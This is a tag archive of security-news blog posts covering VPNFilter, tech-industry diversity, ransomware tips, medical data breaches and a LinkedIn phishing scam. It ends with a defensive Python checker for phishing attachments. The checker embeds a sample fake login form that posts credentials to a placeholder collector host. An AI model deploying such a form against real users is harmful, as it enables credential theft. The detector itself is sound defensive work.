Tag Archives: Symantec

ALERT! Reboot Your Router NOW! – ALERT!

The FBI has issued an urgent warning asking everyone who owns a home router to reboot the device to thwart a Russian cyber attack. Security researchers at Talos, Cisco's cyber intelligence unit, warned of the attack by malware named VPNFilter. According to Talos, VPNFilter has infected an estimated 500,000 consumer routers in 54 countries. Routers targeted are Linksys, MikroTik, Netgear and TP-Link, and potentially others.

On Friday the FBI urged anyone with a small office or home office (SOHO) router to reboot the device to stop the malware. Rebooting is simply turning the device off and then back on again.

According to the FBI, the threat is “significant.” The FBI warning stated that the malware, once it has infected the router, could stop the router from working, collect user information from any device connected to it and possibly block network traffic.

The Justice Department has reported that the malware is connected to a Russian government-backed cyber espionage group that researchers have called Sofacy, APT 28 or Fancy Bear.

The problem is that the FBI can’t determine how VPNFilter is getting on people’s systems. By rebooting the router, owners can disrupt the malware and delete parts of its code. However, the router can be reinfected.

As part of the operation to shut down the malware attack, the FBI, armed with a court order, seized control of a key server in the Kremlin’s global botnet of hacked routers.

The seizure destroys VPNFilter’s ability to reactivate after a router reboots, according to Vikram Thakur, technical director at Symantec. “The payload itself is non-persistent and will not survive if the router is restarted,” said Thakur. “That payload will vanish.”

You can check the security of your router for free by visiting F-Secure.com Router Check.

See also: Oregon FBI Tech Tuesday: Building a Digital Defense Against the “VPNFILTER” Malware



Facebook and Intel Report Diversity Improvement

Maxine Williams, Facebook’s Executive Diversity Chief

Facebook’s surprising diversity report showed marked improvement in hiring of women and minorities. While the report shows that Facebook is still overwhelmingly white and male, the improvements show that Maxine Williams, Facebook’s Executive Diversity Chief, is having an effect on the company. Facebook’s report revealed 35 percent of its staff are women, up from 33 percent a year ago. The number of women in leadership positions is up a percent to 28 percent.

Even with these improvements, retention of female employees in the tech sector is another challenge. Women are leaving the industry after hire in the face of sexism and other bias. So these numbers for Facebook can only be considered an improvement if women stay on with the company.

The report shows an increase of Hispanic employees of 4 to 5 percent and African-Americans by 2 to 3 percent. However, the guys at the top are still white men, making up 71 percent of the company leadership. No change there. The rest of the company leadership is held by Asians at 21 percent, with other groups holding only 2 to 3 percent.

How is Williams making change happen? Alongside the diversity report, Williams blogged about initiatives she believes are improving Facebook’s hiring and workplace culture. She pointed out the “Diverse Slate Approach,” which encourages consideration of applicants who don’t look like the hiring managers. According to Williams, Facebook has discovered that “the more people you interview who don’t look or think like you, the more likely you are to hire someone from a diverse background.” Facebook’s “Managing Inclusion” training program teaches managers to consider what issues affect under-represented groups. Facebook believes that this training helps to build an understanding of how these employees or applicants arrived in the tech industry and what obstacles remain.

Williams believes Facebook is moving in the right direction but said, “We aren’t where we’d like to be.”

Intel CEO Brian Krzanich

Another major tech company is also touting its diversity improvements. Intel has reported that its diversity program is two years ahead of its original plan. “We set out to achieve by 2020 an inclusive workforce that reflects the diversity we see every day in the world around us,” Intel CEO Brian Krzanich wrote in a recent blog post. “Doing this would bring the number of female, Hispanic, African-American and Native American employees in Intel’s 50,000-strong U.S. workforce to full representation.” According to Krzanich, the goal is now moved up to 2018.

Krzanich, in a stand against racism, resigned from President Trump’s American Manufacturing Council after comments the president made about the events in Charlottesville that left one woman dead. According to Krzanich, he wants to “…call attention to the serious harm our divided political climate is causing to critical issues…”

Intel’s mid-year report shows the company’s five-year plan is on track to bring full representation of women, African Americans, Hispanics and Native Americans in both technical and non-technical jobs. According to Intel, full representation is defined as the “full market availability of women and underrepresented minorities.”

“In December of 2014, our gap to full representation was 2,300 employees. Today that gap has narrowed to 801 people, a 65 percent improvement,” said Krzanich.

But like Facebook and other tech companies, white and Asian men still represent almost all top management positions. More than 90 percent of Intel’s mid to senior-level technical roles are white and Asian men. Intel is also dealing with a retention problem with women and minorities. The company says it has added “diversity playbooks” and other programs to help managers hire and retain under-represented groups.

Although diversity in the tech sector is a real issue, and progress is epically slow, there is progress. According to workplace culture and company review platform Comparably, companies are doing better.

Comparably has come out with a list of the top ten companies that are doing better than most in the area of workplace diversity. The scores of these companies are on a 0-100 scale and based on how female employees rate their experience at the company. The diversity score is based on how employees of color rate their experience at a company. Here is Comparably’s list for women.

For diversity




Juniper Networks Names African-American To CTO Post


Kevin Walker

Kevin Walker was named as the Security Chief Technology Officer or CTO for Juniper Networks on November 12th.

Walker comes to Juniper from Walmart, where he served as vice president and assistant Chief Information Officer or CIO. Walker has more than 25 years’ experience working at some of Silicon Valley’s biggest tech companies. His former employers include Cisco, Symantec and Veritas Software.

Juniper Networks designs, builds and operates corporate computer networks and provides security products and solutions for those networks. The company employs 8,800 people in 46 countries.

Walker will take on the job of guiding Juniper Development and Innovation, expanding the company’s security product development. Walker will also help to lead Juniper’s security strategy both internally and externally with investors, partners, influencers and customers.

In a press release Walker said, “Juniper Networks has always challenged conventions in the networking industry and has maintained its focus on cyber security as a core function of how it continues to innovate and transform. I am excited to apply my professional and personal passion to help guide the company in delivering technologies to customers that enable them to stay secure amid today’s evolving landscape.”


National Cyber Security Awareness Month – Ransomware

October is National Cyber Security Awareness Month. The African-American Cyber Report is dedicated to bringing the latest, most relevant cyber security news and information to black people.

Cyber security has become the single most urgent topic of our age. More people fear having their identity stolen than being robbed at gunpoint or murdered.

In order to combat that fear and protect yourself and family members, you need to understand what is happening in the cyber world and how it affects you. When it comes to Internet related news, the African-American Cyber Report answers the question for black people when they ask, “What does that mean to me?”

As part of National Cyber Security Awareness Month the AACR is revealing the top cyber security threats of 2015 and the coming new year and how black people should respond.


First, what is ransomware? Ransomware is a dangerous type of malware which completely blocks access to a computer system. In other words, if you get infected with ransomware your computer will be locked up until you pay the hacker to release your computer and all its files. They often demand payment in bitcoins, and if you don’t pay it is unlikely you will ever use that computer or see the data in it ever again. Yes, there are some ways to defeat ransomware once you get hit, but nothing is guaranteed.

Ransomware is expected to become more refined in its targets and methods. Cyber security experts predict that variants of ransomware may target cloud based data storage such as Google Drive, Dropbox, OneDrive and many more. Once the cloud storage site is detected, ransomware will exploit the stored personal credentials of the logged-in user and will even infect the website where the data is backed up. McAfee has warned that ransomware attackers will try as many ways as possible to extort ransom payments from victims.

Now, how do you avoid getting hit by ransomware? First of all, never, ever click on a link or open an attachment in an email from someone you do not know. And even if you do know the sender, if you are not expecting the email, pick up the phone and call them. Ask: What have you sent me? Did you send it? Remember, many viruses have the capability to email themselves to other computers. If the sender did not send the email, then delete the email immediately. Ransomware is mostly found on suspicious websites, and arrives either via a “drive-by download”, stealth download or through a user clicking on an infected advertisement or pop-up. Other actions you need to perform include:

  • Have security (anti-virus, anti-malware) software installed and up to date with a current subscription. Thousands of new malware variants land on the Internet every day. Outdated virus and malware definitions are almost as bad as having no protection at all.
  • Perform regular updates on all your computer software. This includes the operating system, the browser and all of the plug-ins that a modern browser typically uses. The most common openings for malware and virus infections are software vulnerabilities or zero day exploits. Keeping software up to date helps minimize the likelihood you get caught up.
  • Make sure you are leveraging the full set of protection features delivered in your security product. Symantec and Norton products include five distinct layers of protection: Network (Intrusion Prevention), File (traditional AntiVirus), Reputation (Insight), Behavioral (SONAR) and Repair (ERASER and Norton Power Eraser).

Now you know. Tomorrow, Public WiFi.



Understanding Medical Data Breaches

Medical data breaches are constantly in the news. According to iHealthBeat.org, 1 in 10 U.S. residents have been impacted by a medical data breach. It is highly likely that millions of African-Americans have been the victim of a medical data breach and probably don’t know it. The sad news is that this has become common.

We need to understand a few things about data breaches. First, what is a data breach? What kind of data breaches are there? How many people are affected, and how do you fight back if you think your data has been compromised?

Put simply, a data breach is an incident where sensitive, protected or confidential information has been exposed, stolen or utilized by unauthorized individuals, often to commit some type of crime.

What kind of data breaches are there? Data breaches may expose personal health information (PHI); this is a medical data breach. They may expose personally identifiable information (PII), which is information that, on its own or combined with other information, can be used to identify, contact, or locate a person, or identify an individual in context. Finally, there is a data breach that exposes trade secrets or intellectual property. This usually affects businesses and is sometimes known as industrial espionage.

Medical data breaches often involve massive numbers of people and personal information records. Here are the largest medical data breaches so far this year. Look carefully, your insurance company may be on the list.

Keep in mind that medical insurance companies are not alone when it comes to data breaches. Hospitals and health service providers are a prime target for medical data hackers. The HIPAA Act covers most medical facilities. HIPAA is the federal Health Insurance Portability and Accountability Act of 1996. The law is intended to make it easier for people to keep health insurance, protect the confidentiality and security of healthcare information and help the healthcare industry control administrative costs.

According to Datapipe.com, these are the largest HIPAA data breaches of 2014.

According to a report released by KPMG, 81 percent of health insurance providers and hospitals have had a data breach. The survey revealed:

  • 15 percent of healthcare organizations have no one whose sole responsibility is information security.
  • 23 percent do not have a security operations center to identify and evaluate threats.
  • 55 percent say they have a hard time staffing their organization.

Why is medical data so valuable? Medical records are ten times more valuable to hackers than your credit cards.

Your medical information is a gold mine. You probably have medical information spread over several doctor’s offices, medical services and hospitals including your dentist, pharmacy and physical therapist. These records contain information such as your Social Security number, address and phone number, email, next of kin information, phone numbers, information about your children or spouse, payment information, insurance information, and much more.

Hackers use stolen medical and insurance data to create fake IDs, buy medical equipment or drugs that they can re-sell and file fraudulent claims with insurance providers. Hackers also have more time to use stolen data to commit fraud because medical identity theft is not immediately apparent. And, most of all, these records are easy targets. According to the KPMG report, hospitals and medical insurance companies are poor protectors of your information. According to the security firm Symantec, health care providers saw a 72 percent increase in cyberattacks from 2013 to 2014. Health care companies are required by law to publicly disclose big health data breaches. There were more than 270 such disclosures in the last two years.

So how can African-Americans avoid the theft of their medical information?

  • If your wallet is lost or stolen, make sure your insurer(s) are notified along with your financial institutions.
  • Carefully examine all medical bills and insurance statements you receive. Look for fees from health care providers you do not recognize or statements describing benefits paid out for services you did not obtain.
  • Consider an identity protection service which will help you detect most kinds of identity theft, including medical, much earlier than you might on your own and assist you through the fraud resolution process if your information is stolen.
  • Always be alert to strange phone calls or emails from people asking medical questions or insurance questions, especially if you do not know the company.
  • Alert your caregivers of any suspicious calls or activity regarding your care.
  • Keep a close watch on your credit and banking resources. Alert your financial institutions of any suspicious or fraudulent activity.
  • Take full advantage of credit monitoring services if offered.

The loss of medical data can have a devastating personal impact. An unlucky victim may have their medical insurance coverage cancelled or suspended due to fraudulent claims. Insurance premiums may skyrocket. Others may have their identity stolen completely. Changes, intentional or accidental, to medical records could result in mis-diagnosis or mis-treatment of illnesses. Pay attention to data breach notifications. The African American Cyber Report is an excellent source for the latest breach notifications.

Now you know.


ALERT! – Phishing Email Scam hits LinkedIn – ALERT!

Scammers are phishing for LinkedIn members’ login credentials by sending emails that are supposed to be from LinkedIn Support.

Symantec Senior Security Response Manager Satnam Narang wrote about the phishing campaign observed over the past week.

In the post, Narang stated, “The body of the email claims that irregular activities have prompted a ‘compulsory security update’ for the recipient’s LinkedIn account.”

Opening the attachment leads to a website which looks like a legitimate LinkedIn login page, he said. The scammers have changed the website’s source so that the login and password credentials are sent to the scammer.

The scammers dupe victims into believing the email is authentic by using a lowercase ‘i’, as opposed to an uppercase ‘I’, in the bogus LinkedIn address.

Symantec pointed out that the scammers used HTML attachments in order to bypass browser blacklists. These blacklists serve to keep users off phishing websites. Narang stated the best defense against this scam is to implement LinkedIn’s two-step verification for improved login security.

“With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to log-in without having access to the user’s mobile phone,” he said.

If you believe that you have been scammed and your credentials are compromised, then please change your password immediately and notify LinkedIn support.
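Because the attachment is a local HTML file that browser blacklists never see, a mail filter or analyst can inspect it directly. The following is an added example, not code from Symantec or from the original post: it flags any form in an attachment that collects a password and submits it to a host outside an assumed list of trusted LinkedIn domains. The host names and the sample attachment are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: domain suffixes accepted as genuine LinkedIn login endpoints.
TRUSTED_SUFFIXES = ("linkedin.com",)

class FormAudit(HTMLParser):
    """Records each <form> action and whether the form has a password field."""
    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "has_password": bool}, ...]
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None

def host_is_trusted(host):
    # Exact match or true subdomain only, so "linkedin.com.evil.example"
    # and "notlinkedin.com" are both rejected.
    host = (host or "").lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)

def suspicious_forms(html):
    """Return the action of every password form that posts to an untrusted host."""
    audit = FormAudit()
    audit.feed(html)
    findings = []
    for form in audit.forms:
        if not form["has_password"]:
            continue
        host = urlparse(form["action"]).hostname
        # A local attachment has no origin, so an empty or relative action
        # is also unexpected for a real login page and is reported.
        if not host_is_trusted(host):
            findings.append(form["action"] or "<no action>")
    return findings

# Constructed sample attachment; collector.example is a placeholder host.
SAMPLE = """<html><body><img src="https://www.linkedin.com/logo.png">
<form method="post" action="https://collector.example/save.php">
<input type="email" name="session_key">
<input type="password" name="session_password">
</form></body></html>"""

if __name__ == "__main__":
    print(suspicious_forms(SAMPLE))
```

The check keys on where the password is sent rather than on how the page looks, so borrowed logos and styling from the real site do not affect the result.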